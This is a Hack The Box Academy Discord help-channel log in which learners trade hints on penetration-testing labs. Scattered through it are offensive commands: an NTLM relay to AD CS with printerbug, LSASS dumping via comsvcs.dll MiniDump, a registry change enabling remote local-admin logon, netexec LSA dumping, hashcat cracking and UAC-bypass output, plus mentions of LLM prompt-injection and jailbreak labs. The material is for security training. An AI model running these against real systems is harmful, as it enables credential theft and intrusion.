i completed the category as none of the questions needed the commands, however I'd still like to know the issue. Oh well.
That's because the smb port is closed for this section of questions
only rdp port is open
Hello all, I'm facing an issue in Broken Authentication > Brute forcing password reset tokens, I've obtained the valid OTP via ffuf, but when i input it, it says The provided token is invalid, i've tried multiple times but fail.
Got the flag, i was doing it right i just needed to put the token in the URL
@reef axle I can help you with that dm me
I got it thanks btw
Credential Hunting in Network Shares, can give me some advice? I used SnaffCon, but I can't find it.
https://academy.hackthebox.com/module/147/section/1334
try using powerhunt
if still not work then go to netexec...most likely you will get error from netexec
then do some manually hunting in smb, you will find what you are looking for
How you solved it, I have exactly the same problem
Uhm does anyone know some serious level of hacking here
Do yall know the answer to this or how to get this
Determine what user the ProFTPd server is running under. Submit the username as the answer. ( ProFTPd isn't even installed on the system 😭 )
it's in linux fundamentals
I got a day off, I realized I was posting in off-topic
No hackers here
Hello I need a friend serious one that can walk me in web hacking
Hi, I been stuck on Attacking Authentication Mechanisms Skills Assessment, I think Im on a correct path, I been trying all day but nothing worked, could anyone help me on that
Hi everyone, I am new to the channel, I am facing a problem with one Section of the Prompt Injection Attacks module, specifically the Jailbreaks I section.
Is it the right place to share the problem and ask for suggestions?
I haven't done that module, but if you don't get any takers another option is to use the search feature to see if anyone has received a nudge, hint, or some type of information that might help you too move forward.
alright thanks.
I'm currently doing the Linux File Transfers module, and for some reason when I attempt to SSH into the htb-student user, it loads for a while, and then it gives me this error message "Connection closed by <ip> port 22". I am on a virtual box machine running kali, and I have connected to the VPN. When I retry loading the VPN as well as restarting and getting a new target IP, I still get the same error. Any suggestions?
Hello everyone, I am new and started learning the network basics and I'm stuck on subnetting and subnet masks. Can't understand how to answer the questions in the section of the module. Can you recommend me something to read to understand it more or a good video. Thank you
I did as you said but it gives me another error that I can't understand what it refers to
anyone?
.
Thank you.
hey can anyone please help me out i think i have done everything correct till now but at end i get this (This is from Citrix breakout section from Windows Priv Esc)
Anyone?
Hi, I been stuck on Attacking Authentication Mechanisms Skills Assessment, I think Im on a correct path, I been trying all day but nothing worked, could anyone help me on that
even with chatgpt ?
unfortunately
sorry i am new here i m so excited to learn but i am not at this level
nice to meet you
i am french
its alright, Good Luck!
where do you come from man ?
Can anyone help me
in this
ok nice thank you
You can watch network chuck's ccna playlist
Can you pls share screenshot if possible
I cannot share it...discord wont allow it...Ill copy everything
You are doing password attacks module right
Discord allows
pivot skill assessment
@silver ocean Please do not post content from modules above tier 0, especially skill assessments.
Go to #welcome
ohhhh...ill be careful..then how do I ask for assistance?
You need to do some verification steps
Its like giving hints
Or you can dm me
thank you ill dm you @opal shuttle
Sure
State the module, section, question you're on, state what you've done without revealing content from the module. Anyone who has done the module knows the steps and what to do so they don't need additional context. If you get errors maybe post the error and ask why you may get it, etc. If you feel like you need to reveal a little more info you can ask someone to take it to DM's.
Who finished the module Password Attacks - I got stuck in the Pass the Certificate section. I resolved the first question, but I got stuck on the second one. What tool did you use? I appreciate any hints
the dc01 ccache is helpful
OK, Roger That
for ports DC01 filtered ?
It depends
nmap show and SMBD-Thread-9 (process_request_thread): Received connection from server , attacking target http://server
It helps to know what module you're working on
ok work module Pass the Certificate flag Administrator
So same as the person above
I did exactly what was written in the section, replacing the relevant ips for the crtsrv and dc
ok thanks
I really think she's into me.
What module is this related to? 🤨
isnt this the web challenge
#challenges is more appropriate
Sorry, I'll take it over there.
Do you got root?
do cd /
then cd home
then check if administrator is a user
if so then cat the flag.txt file in it's home directory
try that tell me if it works
Hi Team, i was wondering if someone could be of assistance in reviewing my JavaScript code for XSS- Session Hijacking Model in CPTS, my java code executes the XSS vulnerability and i get a hit on my PHP server on my attack machine but i cant get the cookie to show?
Looks like your XSS payload is working, but it's directing the user to /profilepic/script.js on your server instead of posting the cookie.
thank you got the cookie 🙂
Im in this module not easy
I agree with you on that!
Hello everyone,
I’m looking for someone who has completed the LLM Output Attacks module of the AI Red Teamer path. I need help with the skill assessment because I can’t get the flag.
Hello i am doing Penetrations tester but my cubes end so i decided to take module topics put in ai new will teach me because I am student I don't have money to buy cubes what everyone think
There's a very cheap student subscription option that unlocks modules up to tier 2. I'd look into that instead. AI can be wrong. It also can't teach you like HTB does.
Im a beginner can someone help me get started
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Credential Hunting in Network Shares, can give me some advice? I used SnaffCon, but I can't find it.
https://academy.hackthebox.com/module/147/section/1334
https://academy.hackthebox.com/module/85/section/877 the question asks for the value of rax at _start+16 but it segfaults at +13 the solution to the question is at +0a before rax is set to 0x0 and before we try to add al to rax the first and second time
Guys can help me on Module 307: LLM Output Attacks, Section 3590? Specifically question 2 Im struggling. Tried to do .html markdown and host it and use a python webserver to host the file for uploading but failing 😐 to get the history chat
Best to just say the actual module and section names or link it, no one's going to look that up
Guys can help me on Module 307: LLM Output Attacks, Section 3590? Specifically question 2 Im struggling. Tried to do .html markdown and host it and use a python webserver to host the file for uploading but failing 😐 to get the history chat
okay sir
Is one of y’all hackers
nvm guys solved
Okay
Hi, can anyone help me im stuck on a module since i get "Which version of vsftpd is installed on the target system? (Format: x.y.z)" but its not installed or i might be dumb☃️
try using dpkg --list
thanks it worked🤓
some important info that can help you understand more:
🥰
for installed files, that are fully installed you'll see the status ii in front with dpkg
first i, should be/marked for install
second i, is installed
thanks ima keep that comand in my notes
You have to use power hunt or netexec, you will get errors in netexec so manually login to smb and explore
hey i am trying to connect kali linux to the linux essential modules so i can use my own linux instead of the pwnbox, but i am struggling, anyone interested in helping feel free to dm me
tips for getting help:
It helps to describe the error, not just "i'm struggling"
- What errors/issues are you running into?
- Did you connect to the vpn?
- Are you running the vpn (on your kali) and the pwnbox at the same time (don't do that, it causes networking issues -- collisions aren't fun)
ye my bad, i am really entry level and i have tried to connect to the vpn but do not know if it worked, when i try the ssh command it just blanks out and get stuck
ok so:
In your vpn connection terminal (where you did sudo openvpn academy-regular.ovpn) do you see Initialization Sequence Completed?
it says options error: In [CMB-LINE]:1: Error opening config file: academy-regular.ovpn
Well, there's your error! it sounds like the academy-regular.ovpn file isn't in the directory you're trying to run the command from
if you signed in to HTB and downloaded it from the website within your vm; it'll typically be saved in the Downloads directory;
normally when you open a terminal it opens up to your "home" directory (shorthand ~), so you can just run sudo openvpn Downloads/academy-regular.ovpn
if you're in a vm, most vms allow for drag/drop from host -> guest
i tried the command and the same error came up
i tried dragging the file into linux aswell
if you dragged it into your vm it likely ended up on the desktop
cd ~/Desktop; ls does it show up? or did you receive errors when trying to drag & drop
ohh i am a complete noob... i just dragged the file from my file browser into the terminal
LOL it happens
This Adventure Time quote helps me cope with my massive skill issues
yes, the virtual machine is where you'll do all the hacking/connecting from, you don't run the vpn from your host
okay where do i find the vpn i need to use in the remote desktop conn
you only generally need to download that file once, and you're set for a bit. Occasionally you'll need to download a new one (also known as regenerating) by changing vpn regions
i'm actually working on a python tool to make the process a bit easier, been working off/on that project for a bit. It's gone through a couple iterations
ahh okay but do i need to download virtualbox,VMWare or any of that or can i use the remote desktop connection? and what do you recommend
uuu nice
well you said you had a Kali linux machine, no?
is that a baremetal (no vm)?
oh no i have normal windows machine with WSL
AH wsl, i'm not experienced enough in wsl to kinda go through that stuff. Virtualbox and VMWare are the most popular and Kali has documentation on installing in a vm (there's also just premade vm images for quick plug and play)
ahh okay i will download virtualbox then
I am studying the Prompt Injection Attacks Module and facing problems with the Jailbreaks I section.
I am asked to solve a lab which in the section content is shown to be accessible at http://127.0.0.1:5000/prompt_inject/jailbreak_1.
The instructions (screenshot attached) tell me to ssh into the target (I did spawn it at every attempt).
I tried to ssh into it both from the native HTB Pwnbox and my local HTB VM connected with openvpn. In all the cases I can successfully login but the connection closes immediately (second screenshot). I also tried to use the target as http and https address, but nothing worked.
Has anyone faced a similar situation?
Thanks!
Hi, that is intended behavior as the SSH server does not allow command execution. Please use the -N flag as shown in the Direct Prompt Injection section.
I added a note to all relevant sections 🙂
w vautia
Anyone having issues with labs rn? Doing the DACL Attacks 1 skills assessment and ws01 machine doesn't seem to show up anymore, have reset 4 times and waited 5-10. Showed up initially for the first time solving the lab
Module... password attack / attacking Sam , system , security
I have all the hashes now I want to send it to my machine but .. I can't
It's giving error after error ..
Morning all, Beginner here! , trying to run through the "getting started" module and ive set up a Windows 11 VM installed WSL2 but im unable to run Kali as its asking to enable Virtualization in the bios, ive checked online and ran through some things but can't seem to get it to run , is there something obvious that im missing? , ive checked my local machines bios and AMD-V is enabled same for the VM config, Hyper V is enabled on the VM ( i installed the developer VM from the module )
@fathom pendant hey can U help ?
So real
xfreerdp has the /drive: option /drive:/path/to/file/to/share,name_of_share
also: @rain mirage don't ping people randomly
But is there no way to send a post request (hash.txt) to my target listener ?
That's brilliant, it worked, thank you so much!!!!
well you'd need a python upload.server running, iirc the http.server is only GET requests
if you need more references for transferring files, there's the File Transfers module.
Ya that just accepts get
if you're using evil-winrm, there's the built in upload/download functionality
@fathom pendant i have now downloaded virtualbox and installed kali linux and made my VM, i also enabled host->guest drag and drop, what should i now do to connect the vpn?
drop the file into the vm, open terminal, cd ~/Desktop && sudo openvpn academy-regular.ovpn
@tough zodiac No. Not what this server is about.
i tried opening hackthebox on firefox inside the VM to install the file but it wont let me open the site
?
it could just be taking a minute to load. if you don't have a lot of resources to allocate to a full vm, then it can take a lot longer to load pages
Hello everybody, I’m just wondering if you all have any suggestions for places to look for internships that are in the field of Cybersecurity? Thanks!
This is better suited for #careers-and-certs since this channel is for the modules on HTB. You'll need to follow the instructions in #welcome to gain access.
Ok. Thanks!
i only had ipv6 not ipv4 so i had to force it and now it worked
Hey
Hi, I would like to talk about the "Skill Assessment Part2" of Active Directory. Anyone? : )
exactly about this question
spray and pray :)
Yes, I have Solved it, but I don't understand why that password? :/
I'm newbie! Anyone can guide?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
anyone help me with password module if they done it thanks
Yes
Regarding which part
I have a problem with the Attacking Thick Client Applications topic from the Attacking Common Applications module. Does anybody know how to get the username:password. I literally can not find it. Spent too much time on this topic.
Look up: ippsec - Fatty on youtube
Hi everyone
I am working on editor machine
I have a rev shell but I am stuck on escalating the privileges, can anyone help or give me a hint?
can you guys give me obsidian htb theme again pls
Module name: password attacks, pass the hash lab. Could someone please explain why, even though the base64 encoded reverse shell payload is executed on the target machine, it still fails to connect back to the listener? What mistake might i be making?
wrong channel
go to #1401229864647921734
i thought you are saying that ippsec is fat
Yooo guys
for normal chatting , checkout #general
Hi can someone explain where I'm going wrong? I'm in the stack based buffer overflow module the question asks "Examine the registers and submit the address of ebp as the answer". So I do a buffer overflow to get the offset of 1032 and add it to the esp to get the address of the ebp but I keep getting the wrong answer
These module sections are kinda out of order, only at the end of the Intro to Networking Module does it introduce IP packets but before that comes VLANs, Ethernet frames and all the other stuff that are built on and use IP Packets in certain ways.
Does anyone have a tip on uploading files from Windows to Linux using python upload server? Apparently the POST method to /upload of the server doesn't work because there is an upload form. Any suggestions?
If you are on windows evil winrm provide option to download and upload
If you are on linux you can use base64 and decode it on your host or wherever you want
For real? I didn't know that
Yup
Doesn't work with lsass.dmp for example, unfortunately...
You logged in via evil winrm?
No, I used pass the ticket in mimikatz and opened the PowerShell session on a domain controller as a different user
You can host your smb server
Then open cmd, use move command
Its shown in Attacking Sam section i guess
I've tried that. The problem is that I have pivot. And pivot doesn't allow to redirect to port 445, because you cannot specify the port with the move \ip\share command
I guess running pivot as sudo is a solution? So that it allows ports under 1024
You have rdp right?
I think there is no option to specify a custom port for smb share operations in powershell
Have you tried ligolo for pivoting?
Yes, I do indeed have RDP. But 🙂 That would be too easy. I want to practice file upload from Windows using a scenario where I get a shell only, no evil-winrm or rdp
Yes, ligolo doesn't allow ports under 1024 for redirection
Should I start ligolo as sudo?
Or it could be, they would have given you ssh access...but there is no other option thats y they are giving you rdp option
I dont think that would matter
Check for evilwinrm
Is winrm port open
?
It was a skills assessment for password attacking module. Yes, I transferred the file, but because I had GUI and it was easier
Ohh so you are on the final one
Yes, I solved it, but I can't sleep until I understand how to transfer the files using PowerShell only
Btw i havent looked at it, but ligolo offers a way to download and upload files
Really?
Yeah
I'll write that down...
There is upload function in powershell
It has to be the Invoke-WebRequest class?
Dont remember exactly
There is Invoke-Upload but it doesn't work with older pws versions
Yeah, but unfortunately, as I said, for .dmp files that doesn't work 😦
I am not doing it right now 🙂 I am just asking how I could have done that if I only had powershell access, no RDP or evil-winrm. In a scenario where you perform pass the ticket from a different machine and get a PowerShell from that other windows domain-joined machine
Getting a PowerShell on domain controller. Without pivot that would be smb, easy. But there's pivot so it complicates port usage
I mean, yeah, true, maybe I am asking for too much under various conditions. My goal is to understand what I can do under many restrictions
But I'll definitely add the evil-winrm file transfer to my pentest book
any idea why rdp is stuck on black screen? tried resetting both the target and pwnbox inside Internal Password Spraying - from Windows AD
(its been more than 10 minutes since target is up)
i think its target error because that happens when creds are wrong
either im doing something wrong or im losing my mind lol
can anyone please help me why do I keep getting this error in Windows priv esc citrix breakout in uac bypass part
i also get script failed due to call depth overflow
anyone pls help
its just stuck at rtlleavecriticalsection-> &peb -> Fastpeblock and after this i get bunch of error
maybe tls?
its not connection issue as i already connected in the 3 pic i think its creds issue
Not sure, but you can DM and I'll take a look at some things.
okay
try with .\ maybe?
just a wild guess..
since i guess it is a local user you're conencting to no?
no one is asking me to dm them 😔
Hey guys, earlier in the course I think there was a reference to a website where one could search for vulnerabilities connected to software versions, I don't remember what its called. Anybody know?
Did you decode the cookie?
Did you hit enter inside the black screen? This is sometimes necessary.
Hi there has anyone completed the Android Application Dynamic Analysis recently? Im at the Hooking Native Methods, trying to do the demonstration, but the issue is that they are using an outdated version of frida, which I tried to simulate but even that is not working. The script used in the demo is just not working. I get "TypeError: not a function". I've tried to rewrite it, but no success. If anyone know how to help? Thank you !
I am doing the enumeration module, specifically the Linux Remote Management Protocols, and I had a question about practical application for the r-commands enumeration process. Am I understanding this correctly in assuming that unless we have explicit access to the server's hosts.equiv or .rhosts through some sort of LFI or something of the like, that you are just trying to randomly connect using username/IP spoof combos or something?
Need help with Windows Privilege Escalation DnsAdmins. I really don't understand what this is trying to accomplish.
Nevermind, had to log out and log back in
hello i have a problem with pass the certificate section in password attack module
when i use the printerbug.py it give me this
┌─[us-academy-1]─[10.10.14.232]─[htb-ac-1402630@htb-c8imtf43bh]─[~/krbrelayx]
└──╼ [★]$ python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:'package5shores_topher1'@10.129.234.174 10.10.14.232
[*] Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Attempting to trigger authentication via rprn RPC at 10.129.234.174
[*] Bind OK
[*] Got handle
The NETBIOS connection with the remote host timed out.
[*] Triggered RPC backconnect, this may or may not have worked
[-] An unhandled exception has occured. Trying next host:
[-] Error occurs while reading from remote(104)
then when i enable the debug on the ntlm
sudo impacket-ntlmrelayx -t http://10.129.234.110/certsrv/certfnsh.asp --adcs --template 'DomainControllerAuthentication(Kerberos)' -smb2support -debug
it gave me this
[*] SMBD-Thread-9 (process_request_thread): Received connection from 10.129.234.174, attacking target http://10.129.234.110
[+] Exception:
Traceback (most recent call last):
<SNIP>
OSError: [Errno 113] No route to host
what i am doing wrong?
can some one help with Attacking Web Applications with Ffuf module ?
One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
i have tried many lists on all 3 sub-domains with no luck
try impacket v12
i need help with attacking common applications osticket section, when i visit the vhost at support.inlanefreight.local
(i added it to /etc/hosts ) i get an empty page with Apache/2.4.41 (Ubuntu) Server at support.inlanefreight.local Port 80
Hey guys 👋, I have a question about a task in the course "Windows Event Logs & Finding Evil".
I need to determine which process injected into the process that executed unmanaged PowerShell code. The answer should be the process name.
To find it, I’m using this command:
Where-Object { $_.Message -match "ImageLoaded.*(clr\.dll|mscoree\.dll)" } |
Format-List TimeCreated, ProviderName, Id, Message
The course says to identify malicious .NET assemblies by targeting clr.dll and mscoree.dll.
Any tips on making sure I’m on the right track?
wasn't there a module where we set up a Go Rest api? 🤔
still didn't work
ummm...you can try by increasing timeout
i don't understand
so you cant actually use smbclient, even though the section tells you to run it?
Try the ad cert mentioned in the reading
can you please check dm
Im not at home, also my dms aren't open for random help
In windows priv esc module of citrix breakout at end i get this error
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>powershell -ep bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> cd C:\USERS\Public
PS C:\USERS\Public> ls
Directory: C:\USERS\Public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r-- 7/14/2009 5:08 AM Documents
d-r-- 7/14/2009 4:54 AM Downloads
d-r-- 7/14/2009 4:54 AM Music
d-r-- 7/14/2009 4:54 AM Pictures
d-r-- 4/12/2011 8:28 AM Recorded TV
d-r-- 7/14/2009 4:54 AM Videos
-a--- 8/9/2025 2:51 PM 84149 Bypass-UAC.ps1
-a--- 8/9/2025 3:32 PM 6144 CMSTP-UAC-Bypass.dll
-a--- 8/9/2025 3:32 PM 11776 CMSTP-UAC-Bypass.pdb
-a--- 8/9/2025 2:51 PM 494860 PowerUp.ps1
-a--- 8/9/2025 2:51 PM 3623 Source.cs
-a--- 8/9/2025 3:10 PM 208896 UserAdd.msi
PS C:\USERS\Public> IMPORT-MODULE .\Bypass-UAC.ps1
PS C:\USERS\Public> Bypass-UAC -Method UacMethodSysprep
[!] Impersonating explorer.exe!
[+] PebBaseAddress: 0x7EFDE000
[!] RtlEnterCriticalSection --> &Peb->FastPebLock
[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x00161328
[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x00161330
[?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list
[>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x0016263C
[>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x00162644
[!] RtlLeaveCriticalSection --> &Peb->FastPebLock
It gets stuck in this and after long time bunch of errors come.
Again. Im not at home so I dont have my notes in front of me
I just had a moment to look at my phone
okayy
havent been here for a while, gz Marcie for Mod 😄
Retrying 🙂
Hi there has anyone completed the Android Application Dynamic Analysis recently? Im at the Hooking Native Methods, trying to do the demonstration, but the issue is that they are using an outdated version of frida, which I tried to simulate but even that is not working. The script used in the demo is just not working. I get "TypeError: not a function". I've tried to rewrite it, but no success. If anyone knows how to help? Thank you !
hi, I am solving AEN lab, I was on one of the internal hosts and I got creds of ilf******* user and this user is part of users that can do rdp but rdp is not working for this? Has someone faced a similar issue? I even changed the us server 4 to us server 2, that still didn't solve it
I have a quick question on SQL Injection Fundamentals > Union Clause > Un-even Columns. I was able to get the correct answer but I'm a little confused.
When I used describe <table name> it looked like both tables had the same number of columns. So I wasn't sure why I needed to start incrementing my UNION with junk data. Hopefully this makes sense.
Pivoting is key
Where does it tell you specifically to run smbclient for the given questions? It just tells you to authenticate using RDP.
module attacking lsass , password attacks
CMD=hashcat -m 1000 hash.txt ../wordlist/passwords/rockyou.txt
i can't crack it open, i tried other wordlists besides it as well, any hint?
Try using john the ripper
Thx , but I'm done
Ya , at the end I used a bigger version for that only
I was saying john the ripper because it automatically detects the hash, in case you were using the wrong number
Just give him hash and wordlist
Can you tell name?
Well the same is still rockyou.txt , before I was using a diff rockyou.thx (which was around 200 words) I found a new one which is named rockyou.txt (it's much bigger )
the size of the new one : 139921497 Aug 10 10:22 rockyou.txt
same as me ..
oh
Yeah
I have already pivoted I have access to internal network
can someone help with the Attacking Web Applications with Ffuf module?
One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
i have tried many lists on all 3 sub-domains with no luck
Guys
I'm starting hacking
Please tell do I need to learn coding language
Or later
Staff
Please tell
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
you can dm me
I confirm that the module is working as expected.
First, are you able to install Frida and get it working on the AVD and your host machine?
guys how do i get started
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
i can, what section is this
Hello, thanks for the reply, so yes I ended up finding a way, basically Frida 17.x.x and a too new Android API was making the emulator crash as soon as you start Frida-server.
Found on a bunch of forums that it was still an issue and that 17.x.x versions broke a lot of things in frida.
Also, when you install Frida-tools it automatically updates frida to a new version, so you have to download an old fixed version of frida-tools using frida 16.x.x versions for it to work. Might be good to add a note.
Thank you !
Hello Guys! Can you please advise where to find server ip and port for llm output attacks lab? It seems to be missing in the module. Thanks
click the "click here to spawn target" button
Hey guys am stuck at this question in footprinting module dns section:
it's asking for the fqdn of the name server
i used commands like dig -x x.x.x.x but it always returns NXDOMAIN
the syntax is dig inlanefreight.htb @serverip
the more general syntax is dig do.main @nameserver/or ip
thanks for helping @fathom pendant
Hi guys, I will be taking the CPTS in a few days, i just have the AEN module left, I just wanted to ask if the exam is harder than the AEN module or easier
it'll be harder/more scaled up
the major thing isn't the difficulty, per-se
If you do AEN blind, it'll give you a more solid feel of your methodology and what you might be lacking
yes active directory is defo my weak point currently and report writing so ill do it alongside aen, do you recommend making a list of commands for the exam for all sections or is the cheat sheet for each section sufficient
Keep the cheat sheets handy, but to pass the exam, you need to understand how the attacks work and can't assume that you can simply copy commands 1:1.
I am solving AEN and rdp is not working. It is very annoying. Worked one time then it is not working again. Please help
I can't share commands here, if someone is available for help I can dm
can anyone help me with password attack skill assessment. I setup proxy to scan 172.16.* network from compromised machine. It doesn't seem to work at all. I am kinda stuck in here
doesn't the skill assessment give you a set of ips and hosts?
module:
Attacking Windows Credential Manager
Windows Vault and Credential Manager
i have the user srv01\mcharles in hand but i cant create the lsass file , when i run the command " rundll32 C:\windows\system32\comsvcs.dll, MiniDump 628 C:\Users\nana\new.dmp full " its just not creating any file
any help? does this have to do anything with uac?
Hey Everyone 👋 I am studying the "Active Directory Hardening - Recon & Initial Access" module and I am facing an issue regarding "Remediate finding 7: LLMNR Response Spoofing" on skills assessment section.
Specifically, when I am connecting to DC and trying to link the GPO that I created (Disable LLMNR) to Workstations and Servers under the CORP OU (using Group Policy Management) the CORP directory is empty..!
For example, the 1st screenshot is from the module (showing that there are objects under the CORP directory) and the 2nd screenshot is from the DC (not showing any objects under it..)
And I am not sure what I am missing...
Hey guys , I have a question about a task in the course "Windows Event Logs & Finding Evil".
I need to determine which process injected into the process that executed unmanaged PowerShell code. The answer should be the process name.
To find it, I’m using this command:
Get-WinEvent -Path "C:\Logs\PowershellExec\PowershellExec.evtx" |
Where-Object { $_.Message -match "ImageLoaded.*(clr\.dll|mscoree\.dll)" } |
Format-List TimeCreated, ProviderName, Id, Message
The course says to identify malicious .NET assemblies by targeting clr.dll and mscoree.dll.
Any tips on making sure I’m on the right track?
the question is : What is the password mcharles uses for OneDrive? btw
## Section: **WordPress - Discovery & Enumeration**
### Question: *Enumerate the host and find a flag.txt flag in an accessible directory.*
I have solved other 2 questions but have no clue how to get this one.
https://academy.hackthebox.com/module/113/section/1100
done hint : http://blog.inlanefreight.local/wp-content/FUZZ
i don't recall using minidump for that, also who is nana?
i suggest baking some pasta 😉 alternatively, finding a way to bypass UAC
a character in game (y does that matter but?)
does C:\users\nana exist? and does your user have access to write there :)
(but again not sure what the minidump is for, it won't find the onedrive password)
It's ya boi... Stuck again
I'm on the skills assessment of Information Gathering - Web Edition
And I can't find the hidden admin domain
look for robots 🤖
I've managed to use gobuster, dnsenum and ffuf
if you can't find on one, go to a diff subdomain
The spider didn't pick up robots.txt anywhere 😢
I used uv as package manager to specify the frida version.
that looks like you're doing a dig, but spidering may not reveal robots
But the issue wasn’t to install frida with the right version, it’s when you install frida tools, it automatically reinstalls frida with a newer version. How did you manage to do it?
just check do.main/robots.txt, sub.do.main/robots.txt ... etc
i see your issue @novel finch
you were looking at inlanefreight.com... not inlanefreight.htb
:))
with the spawned ip:port
Oh hey, unrelated. The best way to get access to a roof to jump off?
apt install ladder
(i've been there too, the tunnel vision)
I used uv to install frida as follows:
mkdir -p frida
cd frida
uv venv
uv pip install frida==16.1.11 frida-tools
source .venv/bin/activate
But when i install frida-tools, even in an env, it automatically uninstalls frida 16.x.x and it reinstalls 17.x.x.
I will try with UV
yeah it doesnt say to for the questions, i didn't need to use it for them. Just wanted to follow along with the demo on the section, but couldnt.
you won't always be able to follow the examples 1 to 1
hey just curious , what if i get the mimikatz.exe (with bindshell) and then i run it cos i dont have access to it , as im not admin
finding a way to bypass UAC
i believe the hint gives you a good place to start researching
but pasta is a good substitute (it ran just fine, no need to bypass UAC)
brooo i am not getting what is pasta , i just like eating it thats it
look at the note at the end of the section
something about la...
does anyone have any idea
why my command = netexec smb 10.129.202.137 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
is not working but I am able to create a mimi lsass dump using rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full via rdp connection?
nvm I got it: needed to do the following:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ^
/v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
to make it work you need to find the PID then run the command rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID-here> C:\lsass.dmp full
It was my fault i was running proxychains instead of proxychains4
I'm somehow getting absolutely nowhere compared to when I at least had a wrong answer. I've used ffuf, gobuster and they only find index.html. The spider ReconSpider.py doesn't find anything either. I feel like I'm bashing my head off a desk
Information Gathering - Web Edition Skill assessment
Hey @solar arch! Can I ask you If you faced any problem on "Remediate finding 7: LLMNR Response Spoofing"? 🤔
Does this command look correct? I'm picking up /index.html but that's it?
Hi guys, im doing htb academy and using a kali linux in vmware to do the challenges at the end of every lesson, But everytime i log into the ssh and type some commands, it is incredibly laggy and even completely unresponsive when i use vim. Anybody knows the reason and how i can fix this?
Me too
I tried
and
and both came back with query failed: NXDOMAIN
Yeah I added the machine IP to /etc/hosts, minus the port
Does /etc/hosts accept ports as well?
Hi, I am trying to do the module "nessus assessment" from the "vulnerability assessment" module, but the nessus machine (the one you have to connect to port 8834) keeps crashing / stops responding after a few minutes
is it just me or all the machines are unstable today ?
(will it be better with a vip membership?)
what
I meant, for the box stability
of htb labs?
or academy?
if you are a vip member you get a personal instance of the machine..which means your machine will not be reset like public ones with voting
yeah i'm trying some academy path, the machines keeps crashing on me
what error are you facing
anyway since I want to do a cert I'll just buy the vip thingie
vip is for labs
nothing, just the machine keeps dying, and stops responding, stop pinging . . .
i think for academy it will not be useful
on the academy sometimes you have stuff to do on a target machine
maybe your internet or vpn issue
try tcp vpn
if you are getting errors in udp
also select with low load
well, usual ips (google.com) etc responding fine; and ping packets to htb boxes going correctly thru vpn (confirmed with tcpdump on tun0)
and, restarting the box helps, so it looks like a box problem and not a vpn problem
which module you are talking about?
file transfer module (with rdp); but it does the same with all modules
once i got pinging problem..i cant ping that machine but i was able to smb login lmao
it used to work perfectly all this week, maybe its some load/stress problem ?
yeah
Now I'm stuck trying to scrape this subdomain. scrapy + ReconSpider.py keep coming up empty
I need help with the module Ai this is the last exercise
i guess recon spider worked for me..i dont remember exactly
anyone interested in joining a red/blue server with tools, resources, news, cves, networking, ctfs and live streams - just dm me and i can inv it's a private server
dm me the invite
@opal shuttle well, turns out you were right, works with tcp port 443. Maybe my ISP is doing some filtering shenanigans.
(i mean, tcp vpn)
Hi could I have some help on the windows fundamentals skills assessment, I'm on step 7
it says to just do the exact same steps as the previous company data one but its not got the same outcomes
should i have made the subfolder HR a shared folder too?
like it says remove the default group, but there's only HTB student and the WS01 HR groups there
like i cant remove the default group when share wasn't put on that folder
idk i feel step 7 isn't needed?
doesn't step 6 just do step 7 automatically?
I DONE IT! I AM A HAX0R GOD
But seriously, just so relieved that I'm done 😢
I'll be back in ten minutes with another stupid question.
My biggest issue was the initial enumeration. Once I sorted that the rest was somewhat less frustrating
Also you have to take into account how stupid I am. There's definitely levels and I'm not there
Best module "Password Attacks" 🤡 I have to jump over VPN's to find one that will show me domain inlanefreigth.htb instead of inlanefreight.local that will work and then again everything dies. Only US 2 working with every part of this module (it worked*)
I am stuck on Q5 of the Windows Lateral Movement module.
I am on the WSUS server, but I need administrator privileges to run SharpWSUS. I don't have those privileges. What am I missing?
The port doesnt go in the hosts file
how can i know that there exists a share DC01\david...if it wasnt given in the question?
You can use a tool like snaffler or powerhuntshares
oooh sweet...thanks
If you haven't done the updated password attacks module, I recommend it - they added the network shares section
Are INE certifications good?
They're alright. But this isn't the channel for that discussion. You'll need to link your hackthebox account to the discord via the instructions in #welcome to access #careers-and-certs
How do I get more cubes for pentester path
"Forgot about you" Story of my life xD
Yeah, it really was just the first enumeration that killed me. the default thread count was way too low for the larger files that I should have been using
gg no re
Maybe enumerate administrators?
Yes, I have found one local administrator, but I cannot find the credentials to log in as that user.
You might have to move laterally to enumerate another host.
Does that mean it's a different host from WSUS?
You can DM what information you have.
U guys got any advice for a new guy :/
take notes; that's the most important part that and have patience